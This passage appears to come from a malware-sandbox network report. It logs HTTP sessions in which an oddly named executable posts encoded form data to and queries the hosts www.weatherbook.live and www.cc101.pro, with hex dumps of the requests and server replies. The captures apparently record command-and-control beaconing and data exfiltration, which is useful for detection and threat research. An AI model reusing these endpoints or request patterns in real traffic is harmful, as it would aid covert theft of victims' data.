                                                                                          Data Ascii: gHCXmDU=1AbqsGSWvjVHP6cEPBfdZjZ4M17B62jDv0PzJ36RtALF3WoAHt2cpiFXantwjmn9GJD27+fPEgVOWQC0aBRUB83jpxD8D9cNcEqob/QNh87/SIgIt1J3xHv5L5mq9if64J6ep8RzthXBsTpdoqI2NEjhDwthX58klcNN+H252ASwfxqZEvsiNvz2XNISHigHqCVTp/32hzkP5ARnWXux3Cfal8qW


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.5497193.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:04.614773035 CEST1852OUTPOST /0fox/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.weatherbook.live
                                                                                          Origin: http://www.weatherbook.live
                                                                                          Referer: http://www.weatherbook.live/0fox/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 31 41 62 71 73 47 53 57 76 6a 56 48 50 36 63 45 50 42 66 64 5a 6a 5a 34 4d 31 37 42 36 32 6a 44 76 30 50 7a 4a 33 36 52 74 41 44 46 33 45 67 41 46 4f 75 63 6f 69 46 58 46 58 74 31 6a 6d 6e 61 47 4a 62 71 37 2b 43 30 45 69 64 4f 58 31 4f 30 63 77 52 55 4f 38 33 6a 30 68 44 35 65 4e 64 5a 63 45 37 6a 62 2f 41 4e 68 38 37 2f 53 4e 6b 49 71 67 31 33 7a 48 76 6d 64 70 6d 2b 35 69 66 65 34 4a 69 6f 70 2f 39 4a 34 42 33 42 70 44 35 64 75 5a 67 32 46 45 6a 2f 54 67 73 38 58 35 34 37 6c 63 52 72 2b 48 44 69 32 48 6d 77 63 6b 72 47 58 4f 67 2b 4f 63 54 53 48 4e 35 75 61 30 35 6b 6a 53 55 6b 6c 49 58 76 69 78 38 4d 33 55 52 64 61 31 76 4a 32 45 4b 4e 73 34 37 62 4e 6f 70 74 78 34 2f 55 78 7a 2f 78 69 68 4a 30 72 67 71 38 4f 70 77 79 52 36 6f 52 42 39 70 73 65 58 47 78 51 34 79 30 38 78 6b 46 6e 2f 68 68 6c 65 44 7a 37 79 72 67 77 77 63 6b 6c 35 48 72 37 34 6b 6a 68 6e 77 46 75 33 4e 2f 70 43 4b 61 2f 68 73 33 4e 70 30 78 64 79 70 6b 53 36 30 67 76 6c 66 53 38 30 70 6e 30 35 36 54 56 75 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=1AbqsGSWvjVHP6cEPBfdZjZ4M17B62jDv0PzJ36RtADF3EgAFOucoiFXFXt1jmnaGJbq7+C0EidOX1O0cwRUO83j0hD5eNdZcE7jb/ANh87/SNkIqg13zHvmdpm+5ife4Jiop/9J4B3BpD5duZg2FEj/Tgs8X547lcRr+HDi2HmwckrGXOg+OcTSHN5ua05kjSUklIXvix8M3URda1vJ2EKNs47bNoptx4/Uxz/xihJ0rgq8OpwyR6oRB9pseXGxQ4y08xkFn/hhleDz7yrgwwckl5Hr74kjhnwFu3N/pCKa/hs3Np0xdypkS60gvlfS80pn056TVu/pmX/urgG59GjaqGbat0vWMaNQ1ST8ZP9kra4uA568h/RnscmJzuSIG/iijzzsCfo+N/n34PLFSSuQ+oTv3y51prL4XJB5MME8K0uNkxQbWHotScLnINuUaEsSTNoBynwfeUGAm5UiQumrhYZSR0YEiIs4jQV5YZoaa6mq05JGlh090Apzh4MB93Lhuic1+HzjTUgK6YBFE5px64AVFxO4/zBU9WP72Y1LJqmePXaOcXv1NAoU+5a/t013f+xLa89CI+ToPTSNqO77yAT2lh7uKwgT3I6XI0qLiAYh0T/3WMZUarQCXXjYj8RO5RJ2fVehWmkxtwxTYHfI/ULXdOQsMRJih9SRaXy9s2utvWsiVD+an5Qh+XhEBHSB57k1+2l97XjJ5WeSx7laNVO+qXQOGzkUK49FaEAt0Oo1QcOx8S2u0QrGWB3ssPo9VGvbx2w1msF0Ub+wChzdHs4SR5Vz3E0ut+x4FN3JW3m2ecbQu5fUSHN2/cgd/4IXQc7C52jS9s9zqWJ4r6+XESsS8dgBX7NuKD7OCiF9o0hin9DqFlpyP9Bmf2iKKVJTuGL/vZ3Jy2Mw0Hwz9tXqu/HANp7s5B8ErDAEYRqD1GRCo5dksjZAG4O2/b7A+pCgPgQjbROFlw23LdM+8P2Wk5vBLDjWGtRznLhjd4pF [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.5497203.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:07.160469055 CEST547OUTGET /0fox/?Gh9=g8u8&gHCXmDU=4CzKvyikl1JmGr8+CQf9WWAdO1Gj6lWNmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwJougsDrkF+FnKnugc/NP5deCT95MsghdxHCGfuWAxmiXjA== HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.weatherbook.live
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:45:08.252270937 CEST404INHTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:45:07 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 68 39 3d 67 38 75 38 26 67 48 43 58 6d 44 55 3d 34 43 7a 4b 76 79 69 6b 6c 31 4a 6d 47 72 38 2b 43 51 66 39 57 57 41 64 4f 31 47 6a 36 6c 57 4e 6d 44 50 55 42 48 75 64 73 52 44 58 6d 33 35 65 50 76 57 4a 6b 6e 4e 31 43 6a 39 72 6a 33 4c 47 65 65 65 32 75 63 48 51 44 6a 6b 46 57 56 71 52 57 53 74 77 4a 6f 75 67 73 44 72 6b 46 2b 46 6e 4b 6e 75 67 63 2f 4e 50 35 64 65 43 54 39 35 4d 73 67 68 64 78 48 43 47 66 75 57 41 78 6d 69 58 6a 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Gh9=g8u8&gHCXmDU=4CzKvyikl1JmGr8+CQf9WWAdO1Gj6lWNmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwJougsDrkF+FnKnugc/NP5deCT95MsghdxHCGfuWAxmiXjA=="}</script></head></html>
                                                                                          Sep 30, 2024 18:45:08.252393961 CEST404INHTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:45:07 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 68 39 3d 67 38 75 38 26 67 48 43 58 6d 44 55 3d 34 43 7a 4b 76 79 69 6b 6c 31 4a 6d 47 72 38 2b 43 51 66 39 57 57 41 64 4f 31 47 6a 36 6c 57 4e 6d 44 50 55 42 48 75 64 73 52 44 58 6d 33 35 65 50 76 57 4a 6b 6e 4e 31 43 6a 39 72 6a 33 4c 47 65 65 65 32 75 63 48 51 44 6a 6b 46 57 56 71 52 57 53 74 77 4a 6f 75 67 73 44 72 6b 46 2b 46 6e 4b 6e 75 67 63 2f 4e 50 35 64 65 43 54 39 35 4d 73 67 68 64 78 48 43 47 66 75 57 41 78 6d 69 58 6a 41 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Gh9=g8u8&gHCXmDU=4CzKvyikl1JmGr8+CQf9WWAdO1Gj6lWNmDPUBHudsRDXm35ePvWJknN1Cj9rj3LGeee2ucHQDjkFWVqRWStwJougsDrkF+FnKnugc/NP5deCT95MsghdxHCGfuWAxmiXjA=="}</script></head></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.549721188.114.96.3801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:14.011528969 CEST794OUTPOST /9apq/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.cc101.pro
                                                                                          Origin: http://www.cc101.pro
                                                                                          Referer: http://www.cc101.pro/9apq/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 47 46 4c 6a 41 31 56 45 39 45 72 79 45 31 76 64 56 67 76 48 65 54 66 4d 68 53 4f 54 42 46 2f 6a 56 36 78 58 73 6d 64 57 58 30 7a 56 43 4e 66 48 4a 69 4f 65 57 73 4f 49 57 43 69 58 41 4a 37 79 66 74 4f 67 65 70 36 6d 37 59 71 69 43 71 4b 55 47 71 58 33 71 65 4a 69 35 69 49 6c 42 38 4a 2b 46 44 55 4f 54 46 7a 68 53 66 7a 35 74 4c 43 78 79 2b 33 49 63 6b 7a 44 34 39 75 67 78 78 69 65 41 73 6b 65 4e 46 46 31 53 70 45 7a 35 58 67 74 45 65 72 79 75 44 33 34 43 69 31 47 34 4f 37 72 53 39 31 69 4c 64 6b 31 44 31 67 79 58 6e 35 44 38 69 55 70 37 46 6b 70 50 75 7a 52 59 58 69 61 41 69 63 67 37 2f 77 3d
                                                                                          Data Ascii: gHCXmDU=GFLjA1VE9EryE1vdVgvHeTfMhSOTBF/jV6xXsmdWX0zVCNfHJiOeWsOIWCiXAJ7yftOgep6m7YqiCqKUGqX3qeJi5iIlB8J+FDUOTFzhSfz5tLCxy+3IckzD49ugxxieAskeNFF1SpEz5XgtEeryuD34Ci1G4O7rS91iLdk1D1gyXn5D8iUp7FkpPuzRYXiaAicg7/w=
                                                                                          Sep 30, 2024 18:45:16.318583965 CEST690INHTTP/1.1 405 Not Allowed
                                                                                          Date: Mon, 30 Sep 2024 16:45:15 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0aMxMBIN5eM1IQKmyDGiikIFEKp9PjhRlcFRMHx8UCRuT2W45rY1t4fl%2FylM1NBhvEKnIUQDIHwUhE40YGvf3RzoEI%2Bw1CdJF1YkTcloBr90gHbMTnVBlFHaODHZh8FZ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5aea5296f7cae-EWR
                                                                                          Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0
                                                                                          Sep 30, 2024 18:45:16.320951939 CEST690INHTTP/1.1 405 Not Allowed
                                                                                          Date: Mon, 30 Sep 2024 16:45:15 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0aMxMBIN5eM1IQKmyDGiikIFEKp9PjhRlcFRMHx8UCRuT2W45rY1t4fl%2FylM1NBhvEKnIUQDIHwUhE40YGvf3RzoEI%2Bw1CdJF1YkTcloBr90gHbMTnVBlFHaODHZh8FZ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5aea5296f7cae-EWR
                                                                                          Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.549722188.114.96.3801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:16.621462107 CEST814OUTPOST /9apq/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.cc101.pro
                                                                                          Origin: http://www.cc101.pro
                                                                                          Referer: http://www.cc101.pro/9apq/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 47 46 4c 6a 41 31 56 45 39 45 72 79 46 56 66 64 47 44 48 48 59 7a 66 44 75 79 4f 54 62 31 2f 64 56 36 74 58 73 69 45 4a 58 6d 6e 56 43 76 48 48 49 67 6d 65 52 73 4f 49 5a 69 69 65 50 70 37 73 66 74 43 47 65 6f 57 6d 37 59 2b 69 43 76 75 55 47 5a 76 6f 72 4f 4a 38 32 43 49 6e 4c 63 4a 2b 46 44 55 4f 54 45 44 59 53 66 37 35 74 36 79 78 30 64 76 50 44 55 7a 43 2f 39 75 67 31 78 69 61 41 73 6b 6f 4e 48 78 54 53 73 59 7a 35 54 73 74 45 4d 54 78 6b 44 33 2b 4e 43 31 59 2b 76 61 34 56 65 39 77 58 50 77 78 52 46 67 56 62 78 55 70 6d 41 63 42 6f 6c 49 52 66 39 37 6d 4a 6e 44 7a 61 42 4d 51 6c 6f 6c 31 4d 66 4b 6d 53 49 55 59 4a 57 38 45 42 53 56 66 4b 75 61 63
                                                                                          Data Ascii: gHCXmDU=GFLjA1VE9EryFVfdGDHHYzfDuyOTb1/dV6tXsiEJXmnVCvHHIgmeRsOIZiiePp7sftCGeoWm7Y+iCvuUGZvorOJ82CInLcJ+FDUOTEDYSf75t6yx0dvPDUzC/9ug1xiaAskoNHxTSsYz5TstEMTxkD3+NC1Y+va4Ve9wXPwxRFgVbxUpmAcBolIRf97mJnDzaBMQlol1MfKmSIUYJW8EBSVfKuac


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.549723188.114.96.3801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:19.166954994 CEST1831OUTPOST /9apq/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.cc101.pro
                                                                                          Origin: http://www.cc101.pro
                                                                                          Referer: http://www.cc101.pro/9apq/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 47 46 4c 6a 41 31 56 45 39 45 72 79 46 56 66 64 47 44 48 48 59 7a 66 44 75 79 4f 54 62 31 2f 64 56 36 74 58 73 69 45 4a 58 6d 2f 56 43 38 50 48 49 47 75 65 51 73 4f 49 55 43 69 62 50 70 36 77 66 74 4b 43 65 6f 4b 59 37 62 47 69 45 4a 69 55 41 73 44 6f 69 4f 4a 38 75 43 49 71 42 38 4a 72 46 46 30 52 54 46 2f 59 53 66 37 35 74 35 61 78 7a 4f 33 50 51 45 7a 44 34 39 76 68 78 78 6a 2f 41 76 56 64 4e 48 31 6c 53 59 55 7a 35 33 41 74 49 66 72 78 35 54 33 38 4b 43 30 4c 2b 76 58 67 56 65 52 38 58 4f 46 63 52 48 67 56 5a 6b 35 4b 33 41 49 68 79 6b 49 58 61 4e 72 38 52 67 2f 6a 54 68 45 71 76 71 46 72 48 72 44 4d 53 2b 73 67 4a 31 31 33 62 32 39 66 43 49 7a 67 32 70 56 6a 41 6f 37 42 4a 75 38 53 49 4d 4e 6b 6c 56 4a 65 6b 32 55 4e 58 66 38 59 59 58 66 45 38 6f 6e 64 34 59 5a 71 79 55 35 37 51 61 5a 34 4e 58 6a 31 4b 43 4e 70 75 52 45 6c 65 4c 38 48 33 75 71 41 6e 65 69 4b 54 65 4b 58 51 72 47 6e 77 69 59 6e 32 62 50 56 66 44 67 43 63 33 62 52 45 74 54 49 68 73 32 51 58 6f 2f 4c 69 67 [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=GFLjA1VE9EryFVfdGDHHYzfDuyOTb1/dV6tXsiEJXm/VC8PHIGueQsOIUCibPp6wftKCeoKY7bGiEJiUAsDoiOJ8uCIqB8JrFF0RTF/YSf75t5axzO3PQEzD49vhxxj/AvVdNH1lSYUz53AtIfrx5T38KC0L+vXgVeR8XOFcRHgVZk5K3AIhykIXaNr8Rg/jThEqvqFrHrDMS+sgJ113b29fCIzg2pVjAo7BJu8SIMNklVJek2UNXf8YYXfE8ond4YZqyU57QaZ4NXj1KCNpuREleL8H3uqAneiKTeKXQrGnwiYn2bPVfDgCc3bREtTIhs2QXo/LigHDdKFrH4l03OOGPRPxB0dU5P8+ETglBklfsDckoHxgdf/aBxTRYDhdvrVQKMC7YCbg56pxFL04bPRcZa9sgPCn4MlxFkBVm+MHT9cQ8Bvdn/5O4JHyH7avpJKujG6gc7I5JWQ13WrSrbXrhJu6E01RbJyBrmO8OT25qiq7bMTdEPo8nsGWHhn2rPtbbWLfADUKhsrlKzzbiTlAZ1l0zy2JM5P4Qrr7LVXk0wTPRfl1AXU2Xp5vqrp/vES2T/RfIwXxp9K8GeFHzNar0Z1pSzriW7exYw27VJ1A/1R3UwEh/IxnLoCRIXRDLmY/e+b5o6REAMDC8A/A0dXfOQJKhExQaOxij8zqu/SADuWtKn80J1naSe/y3yHitVpwa0txvIeEB1dbvgLJJ0N1GKW4tKeMr85/9BRK2DxlfsiEVFr1Jlbiw5aDEuW3iEcHOxxGKEOtbL2sxKfGlY3jYTixqZe4lkNdrGAYXTO4D9DNPNLCXk7kc6QC66gQ/omLsbweI3OH9xW5KwCnF3IOFyo4nV6LuN9e+F573wNcrCyk/4PsDHMmBSaJdRi5/x0K2smFN8cNOWJjUcRmgLYdTHTEUYjiVntHrsn80h9a7cGTtyKOTs5hh7SiXdaJYoxCuy/ZYv0rvYXQ6/Pwbm7rxERSojEJgvW8+xcYCEm3 [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.549724188.114.96.3801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:22.809087038 CEST540OUTGET /9apq/?gHCXmDU=LHjDDAx19xzpDFr0PiWSUWbLpibiWm2OcttpvXYQA3jhT8+aBAnUV8C6f3e3WqOmZ67HZ5Oe4rCfD6agN7j3kbNhxDE+C6RgPFZIWir2F/mXh+rIzbzvAjzVwKDU5y7xZw==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.cc101.pro
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:45:24.969702959 CEST1236INHTTP/1.1 200 OK
                                                                                          Date: Mon, 30 Sep 2024 16:45:24 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Last-Modified: Fri, 27 Sep 2024 08:35:58 GMT
                                                                                          Vary: Accept-Encoding
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GbcmGyNdv6GPfTxv7r8YhlQqnTFCW0oKkcqWzylUAZRb0NbdX71PPNZ0klWtkRY1WJ1gSF8tzYGxqplUMxje1nWiGOraTfpYAEHnX2WLm6WngHiN2CxDgqVUU162XQ7c"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Speculation-Rules: "/cdn-cgi/speculation"
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8cb5aedc09741a48-EWR
                                                                                          Data Raw: 64 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e e6 ac a2 e8 bf 8e e5 85 89 e4 b8 b4 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 36 65 61 65 62 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 20 32 30 30 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 35 70 78 20 31 35 70 78 20 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 [TRUNCATED]
                                                                                          Data Ascii: de0<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"><title></title></head><body style="background: #e6eaeb;"><div style="position: relative;margin: 200px auto 0;padding: 0 0 22px;border-radius: 15px 15px 5px 5px;background: #fff;box-shadow: 10px 20px 20px rgba(101, 102, 103, .75);width:95%;max-width: 400px;color: #fff;text-align: center;"><canvas id="canvas" width="200" height="200" style="display:block;position:absolute;top:-100px;left:0;right:0;margin:0 auto;background:#fff;border-radius:50%;"></ca
                                                                                          Sep 30, 2024 18:45:24.969793081 CEST1236INData Raw: 6e 76 61 73 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 32 34 32 34 32 34 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 31 31 70 78 20 20 30 20 32 30 70 78 22 3e e9 80 9a e8 bf 87 e5 ae 89 e5
                                                                                          Data Ascii: nvas><div style="color: #242424;font-size: 28px;padding:111px 0 20px"></div><div style="margin: 25px 0 14px;color: #7b7b7b;font-size: 18px;">&#65;&#71;&#30452;&#33829;&#32;&#20449;&#35465;&#20445;&#35777;</div><a id
                                                                                          Sep 30, 2024 18:45:24.969829082 CEST1236INData Raw: 20 20 20 20 20 20 63 74 78 2e 73 74 72 6f 6b 65 53 74 79 6c 65 20 3d 20 22 23 64 31 64 32 64 34 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 61 72 63 28 30 2c 20 30 2c 20 72 61 73 20 2a 20 30 2e 38 2c 20 30 2c
                                                                                          Data Ascii: ctx.strokeStyle = "#d1d2d4"; ctx.arc(0, 0, ras * 0.8, 0, Math.PI * 2, false); ctx.stroke(); ctx.strokeStyle = "#00a2ff "; ctx.lineWidth = ras * 0.12;
